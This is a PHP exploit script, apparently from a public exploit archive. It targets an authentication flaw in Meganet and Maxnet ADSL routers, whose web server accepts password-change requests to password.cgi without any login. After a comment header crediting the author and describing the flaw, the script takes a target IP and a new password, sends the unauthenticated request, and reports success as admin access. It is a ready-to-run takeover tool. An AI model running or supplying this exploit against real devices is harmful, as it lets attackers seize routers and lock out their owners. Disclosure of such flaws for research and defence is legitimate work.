<?php /* Exploit Title : Meganet And Maxnet Adsl Routers Unattended Admin access Date : 24 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : NO WEBSITE FOUND Platform : Hardware Tested On : Meganet 96333EW Firmware Version: 3.10L.02.A2pB022g.d20h -------------------------- Unattended Admin access -------------------------- embedded web server , serves cgi files without validating credentials . so attacker could change settings like admin password . changing admin password does not require old password . this exploit allows attackers to change admin password remotely without any authentication . ------------------------- PoC Video Link ------------------------- http://youtu.be/NvNwk3BSjOk */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Get($url) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: $url"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $target = "http://$host/password.cgi?sysPassword=$password"; if(strpos(Get($target),urldecode($password)) > 0){ print "now you have admin access "; }else{ print "Humm , No Chance !"; } ?>